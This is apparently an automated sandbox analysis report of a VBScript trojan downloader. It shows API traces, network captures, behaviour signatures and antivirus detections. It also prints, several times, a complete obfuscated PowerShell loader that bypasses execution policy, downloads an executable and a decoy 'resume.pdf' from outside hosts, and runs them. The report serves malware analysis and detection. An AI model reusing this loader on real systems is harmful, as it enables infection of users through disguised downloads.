@(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
cmdline powershell.exe -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff80000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data received 7
Data received 3¦k%n˜ëºS~æ/!¶jßǗ]6q‹‡K8DOWNGRDÀ ÿ 
Data received ª
Data received ¦£0‚0‚ O>LìTdvTI³ájÖ ô0  *†H†÷  021 0 UUS10U  Let's Encrypt1 0 UR30 230814194251Z 231112194250Z010U transfer.sh0Y0*†HÎ=*†HÎ=Bˆ®}õš›0î9Ìýª .Y~ß_EV@ä)zD†¥ÕzÁ¡¡f̝ ‡‘˜pgAď]ÃÁíáD†ç£‚ 0‚ 0Uÿ€0U%0++0 Uÿ00U25GÙuå–\Þ5æR®ÒΆî0U#0€.³·XVË®P @毝‹ÂÆ0U+I0G0!+0†http://r3.o.lencr.org0"+0†http://r3.i.lencr.org/0U0 ‚ transfer.sh0U  0 0g 0‚ +Öyõòðv·>û$ߜMºuò9źXôl]üBÏzŸ5Ğ %í´™‰õɄ¯G0E!æ=| r’ýp8)’@·Ø¤//®¿;õÐÅñf¿:€¬’ñY dÛtI5L„yéª ?¡º)B†u\xÿûöYábÓïÙNv­÷¾ú|ÿȋ=œ>j´g)]ϱ $ʅ†4ë܂Š‰õɄåG0E wÞ .j?-’–)JUDïáâl-Çf™@Õð•!!Ë]mæ›ëÁø{þo]\G¬.‡#%ÄNJ’ñ(JÑ10  *†H†÷  ‚UgpŒQ¤5ûñTBØ|6I‹+/ù8e Ÿ3«ÒZ •j(€:8Àwþîà']V¼Eï¤õøò:´=[Bhb«âbc.Êg)RaĹSɜÍbiã™@cÖÜj÷œB †Dew2ZîB„¤Puxɛ^7¹=Üû:ÇÇZ…`ìXuÀ˜gêO°åŸ>Ë\Ëq»‡;ÄGœì ëeö÷Iö À‚úý c»HKQÃN46)̤x7n¨žqý4WDé- ’vŽš½Ÿ5¯A› ©°Ã˜©:½¦ó-ûN4ç\ñ=ú&™=„©cè³SI Œ`nÎ= 0‚0‚þ ‘+JÏ §SöÖ.%§_Z0  *†H†÷  0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10 200904000000Z 250915160000Z021 0 UUS10U  Let's Encrypt1 0 UR30‚"0  *†H†÷ ‚0‚ ‚»(Ìö ”ÓìU’Ãø‚ñ™¦zBˆ§]&ªµ+¹ÅL±¯ŽkùuÈ£×G”U5WŒž¨¢9õ‚<B©Nnõ;Ã.ۍÀ°\óY8çíÏiðZ ¾À”$%‡ú7q³ç¬á›ïÛä;ERE–©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m—¥@4k+Ó¼fëf4|úk‹W)™ø0]ºroûÅ­Ò†X=Çç »ñ+÷†ÜÁÚq]ÔFãÌ­%Áˆ¼`guf³ñ÷¢\æSÿ:ˆ¶G¥ÿê˜ w?SùÏåõ¦p¯c¤ÿ™³“ÜS§þH…¡i®%u»ÌRõíQ¡‹Û£‚0‚0Uÿ†0U%0++0Uÿ0ÿ0U.³·XVË®P @毝‹ÂÆ0U#0€y´Yæ{¶åäs€ˆÈXöé›n02+&0$0"+0†http://x1.i.lencr.org/0'U 00  †http://x1.c.lencr.org/0"U 00g 0  +‚ß0  *†H†÷  ‚…ÊNG>£÷…D…¼Õgx²˜c­uM–=3erT- êÃíø ¿_Ì·p·n;ö^”Þä Ÿ¦ï‹²碵<‘δí9ç|%ŠGæen?FôÙðΔ+îTμŒ'K¸Á˜/¢¯Íq‘J·È¸#{-ùW>ƒÙ3 G!x ‚'Ã*ț¹Î\òdÈÀ¾yÀOŽmD ^’».÷‹áèD)ÛY íc¹!ø&”“W eÁ "® C—¡~àà†7µZ±½0¿‡n+*ÿ!NÃõ—ð^¬Ã¥¸jð.¼;3¹îKÞÌü䯄 †?ÀUC6öhá6jŽ™Ñÿ¥@§4·ÀÐc959unòºvȓé©KlÎ Ù½ûŸ·hÔe³‚=wSøŽy­ 1u*CØU—rÄ)÷Ä]NÈ®F„0×ò…_¡y»ç^p‹ᆓùÜaq%*¯ßí%PRh‹’ÜåÖµãÚ}Їl„!1®‚õû¹«È‰=áLå8ö½+½–ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|“/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£“¸õ‹/ ÒRC¦o2WeM2ß8S…]~]f)ê¸Ý䕵͵VBÍÄNÆ%8DPmìÎUþéIdÔNʗœ´[Às¨«¸GÂd0‚`0‚H @w!7ÔéB¸îvª<d ·0  *†H†÷  0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10‚"0  *†H†÷ ‚0‚ ‚­è$sô7ó›ž+W(‡¾Ü·ß8Œn<æW x÷u¢þõjnöO(ÛÞh†lD“¶±cýk¿Òê1›!~Ñ3<ºHõÝyß³¸ÿñ!šKÁŠ†qiJffl~<p¿­)"óäÀ怮âK·™~”ŸÓG—|™H#Sè8®O oƒ.ÑIWŒ€t¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOŽK~Ï èÿµw.ô²{JàL% p) áS$ìÙJŒ?‰£aQÞ¬‡”ôcqì.âo[˜á‰\4ylvï;byæÛ¤š/&ÅÐáÞÙŽû·÷¨÷Ç嘏6•çâ7– 6užûr±›¼ùI؁Ý´*ÖAé¬v• ØßÕ½5/(lҘÁ¨ dwnG7ºÎ¬Y^hr։ÅA)>Y>Ý&õ$ɧZ£L@F¡™µ§:Qn†;ž}r§xYí>Qx Ð/²>{JKsüÆêàP|C“t³ÊtçŽÐ0Ô[q6´ºÁ00\H·‚;˜¦}`Š¢£)‚̺½ƒ¢ƒA¡Öñ¶ð¨|†;F¨H*ˆÜvšv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpˆ­Næً:ÆÝ'Qnÿ¼dõ3CO£‚F0‚B0Uÿ0ÿ0Uÿ0K+?0=0;+0†/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0€ħ±¤{,qúÛáKuÿÄ`…‰0TU M0K0g 0? +‚ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -†+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäs€ˆÈXöé›n0  *†H†÷  ‚ sl–nÿRЮ݌çZ­/¨ã¿É PÂålB»o›ô´OÂDˆuÌë›bnxÞì'º9\õ¢¡nV”pS±»ä¯Ð¢Ã+ԖôÅ 53ùØa6àq´¸µª‚E•Àò©#(çÖ¡ËgÚ C,ª“ÉÞõ«i]õ[†X"ÊMUäpgmÂWÅF9AϊXƒXm™þWè6ð#ªýˆ—Ðã\”Iµµ5Ò.¿N…ïà…’ë;l)# `ÜEL;éûÞÜDøX˜®ê½EE¡ˆ]fÊþéo‚ÈB ûéìã†Þã8ú¤}±ØèI‚„›+èkO 8w.ùÝç9
Data received ’
Data received ŽA…”' xÔÖÀ~éJÀy<m:2P›YrtΧ« ‹ÐxŸ=Æi_.Â_¨øà S`øÊL䎿Ä|ÛூªLšRG0E!Î¥tb0ø5±óps^›¡pn……ÏUe…‚mçà æ i4&tÿ“’÷×—mš\m¢ùÝÉš"ç›C
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ¬™[Vedp™ÎÖﳸ®M5…ÓÜ×m¡e{"óY&ì` ¦L#ŠéT"X(†
Data sent okdüggÕT„†ñEÑ9*X?‡¦Ç¦ßôRkêû /5 ÀÀÀ À 28*ÿ the.earth.li  
Data sent okdügg¸}z£l…P–²ãŸk'ÑÒ·ø¥§ë*/5 ÀÀÀ À 28*ÿ the.earth.li  
Data sent njdügm©qª’KºR‡S×ûçÃÆÆK¾Š:øZ¼/5 ÀÀÀ À 28)ÿ transfer.sh  
Data sent FBA2ÞhqI–fÃÓÍJq¹©¿)9EÖ]0‹m¸Ù»…»sÇH7áŒìЃxæ=pPÒ¹Ò‹rl P—£0¶0s˜zq©Í¤_-+4ŠB_óö=ièÿÓzu¼uq¡}(†eWªeÊ¢À§®&2j>
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
Time & API Arguments Status Return Repeated

send

 buffer: okdüggÕT„†ñEÑ9*X?‡¦Ç¦ßôRkêû /5 ÀÀÀ À 28*ÿ the.earth.li  
socket: 1272
sent: 116
1 116 0

send

 buffer: okdügg¸}z£l…P–²ãŸk'ÑÒ·ø¥§ë*/5 ÀÀÀ À 28*ÿ the.earth.li  
socket: 1272
sent: 116
1 116 0

send

 buffer: njdügm©qª’KºR‡S×ûçÃÆÆK¾Š:øZ¼/5 ÀÀÀ À 28)ÿ transfer.sh  
socket: 1000
sent: 115
1 115 0

send

 buffer: FBA2ÞhqI–fÃÓÍJq¹©¿)9EÖ]0‹m¸Ù»…»sÇH7áŒìЃxæ=pPÒ¹Ò‹rl P—£0¶0s˜zq©Í¤_-+4ŠB_óö=ièÿÓzu¼uq¡}(†eWªeÊ¢À§®&2j>
socket: 1000
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1796
0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\putty.exe
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
Process injection Process 2620 resumed a thread in remote process 2708
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000358
suspend_count: 1
process_identifier: 2708
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Script.Generic.4!c
FireEye VB:Trojan.Valyria.6828
ALYac VB:Trojan.Valyria.6828
VIPRE VB:Trojan.Valyria.6828
Sangfor Malware.Generic-VBS.Save.d3bc8d82
Arcabit VB:Trojan.Valyria.D1AAC
Cyren VBS/Agent.APP!Eldorado
ESET-NOD32 VBS/TrojanDownloader.Agent.XAO
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.6828
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.6828
Tencent Vbs.Trojan-Downloader.Der.Ocnw
Emsisoft VB:Trojan.Valyria.6828 (B)
F-Secure Malware.VBS/Dldr.Agent.VPJK
Jiangmin Trojan.Script.amhb
Avira VBS/Dldr.Agent.VPJK
GData VB:Trojan.Valyria.6828
Google Detected
MAX malware (ai score=86)
Fortinet VBS/Agent.UQJ!tr